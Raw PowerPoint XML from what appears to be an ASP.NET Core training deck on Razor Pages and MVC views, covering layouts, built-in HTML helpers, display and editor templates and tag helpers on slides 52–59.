            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.cshtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2337326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Module 4: Razor Pages &amp; MVC Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>View Fundamentals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson: Role of Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38624718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Demo: Layout and Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11431385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Razor Pages &amp; MVC Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 2: Razor View Engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson: HTML Helpers, Display, and Editor Templates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42184043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HTML Helpers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>External helpers are like regular extension methods and it takes the first parameter to HtmlHelper object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6847" y="2207941"/>
            <a:ext cx="7941105" cy="3666240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="330200" dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:alpha val="68000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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521859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Built-in HTML Helpers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Html.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CheckBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("myCheckbox", false)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Html.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("myHidden", "val") </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Html.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>RadioButton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("myRadiobutton", "val", true) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Html.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("myPassword", "val") </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Html.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TextArea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("myTextarea", "val", 5, 20, null) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Html.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TextBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("myTextbox", "val") </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4116"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052" y="4491349"/>
            <a:ext cx="11092536" cy="1141562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="228600" dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:alpha val="8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FFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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203251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Built-in Display Templates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EmailAddress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HiddenInput</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text and Raw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Boolean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decimal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>String</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Object</a:t>
            </a:r>
          </a:p>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Arrow: Right 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C9AAB42-14E8-4FA1-B253-4986236EB60A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7632192" y="3428998"/>
            <a:ext cx="978408" cy="484632"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="129038">
              <a:lumMod val="75000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="ctr" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr lang="en-US" kern="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEAB08F7-5072-4008-8EBC-3E025A738308}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3149368" y="1184995"/>
            <a:ext cx="4318232" cy="4872058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BD9476-7E98-4ED8-905F-1D7A10EF535B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8715354" y="2882831"/>
            <a:ext cx="2867046" cy="1476386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42293753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Built-in Editor Templates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HiddenInput</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MultilineText</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Boolean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decimal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>String</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4917223" y="1371600"/>
            <a:ext cx="4610100" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="3312319"/>
            <a:ext cx="9137903" cy="1590675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Down Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724185" y="1937289"/>
            <a:ext cx="498088" cy="1222629"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="129038">
              <a:lumMod val="75000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="ctr" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>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8" name="Slide Number Placeholder 7"/>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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430428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Display and Editor Templates</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8326" y="1828800"/>
            <a:ext cx="5210548" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="469900" dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:alpha val="76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FFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:effectLst/>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455421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Demo: Editor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15890884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Razor Pages &amp; MVC Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 2: Razor View Engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson: Tag Helpers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40375482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Tag Helpers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
